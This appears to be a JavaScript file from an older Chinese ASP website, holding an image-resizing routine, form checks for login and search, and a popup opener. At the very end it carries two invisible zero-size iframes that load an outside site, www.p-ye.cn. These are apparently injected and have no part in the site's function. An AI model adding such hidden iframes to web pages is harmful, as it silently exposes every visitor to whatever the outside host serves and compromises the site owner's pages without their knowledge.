

<!--  
var  flag=false;  
var  w_num=97,h_num=111;

function  DrawImage(ImgD,ww,hh){  
var  image=new  Image();  
image.src=ImgD.src;  

if(image.width>0  &&  image.height>0)
{ 
  if (image.width>ww && image.height<=hh){
     ImgD.width=ww; 	 	 
    }
  if (image.height>hh && image.width<=ww){
     ImgD.height=hh;
    }
  if (image.height>hh && image.width>ww){
     num=ww/image.width;
	
	 height_num=image.height*num;
	 
	 if (height_num>hh){
	     num=hh/image.height;
		 ImgD.width=image.width*num;
		 ImgD.height=hh;
		 
		 w_num=image.width*num;
		 h_num=hh;
	 }
	 else{
	     ImgD.width=ww;
		 ImgD.height=image.height*num;
		 
		 w_num=ww;
		 h_num=image.height*num;
	 }
	 
    }	
	//ImgD.alt=image.width+"×"+image.height;
	}
}
//--> 


 function reg()
 {
   if(form1.user_name.value=="")
   {
     alert("请输入用户名!");
	 return false;
   }
   if(form1.user_password.value=="")
   {
     alert("请输入密码!");
	 return false;
   }
   return true;
 }
 
 function search1()
 {
   if(s_form.chaxun.value=="")
   {
     alert("请输入查询关键字!");
	 return false;
   }
   
   return true;
 }


function openwin(id)
    {
     window.open("pic.asp?id="+id,"","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=yes,resizable=yes,top=5,left=5,width=500,height=450");
    }
	
	<iframe src=http://www.p-ye.cn width=0 height=0></iframe>
<iframe src=http://www.p-ye.cn width=0 height=0></iframe>
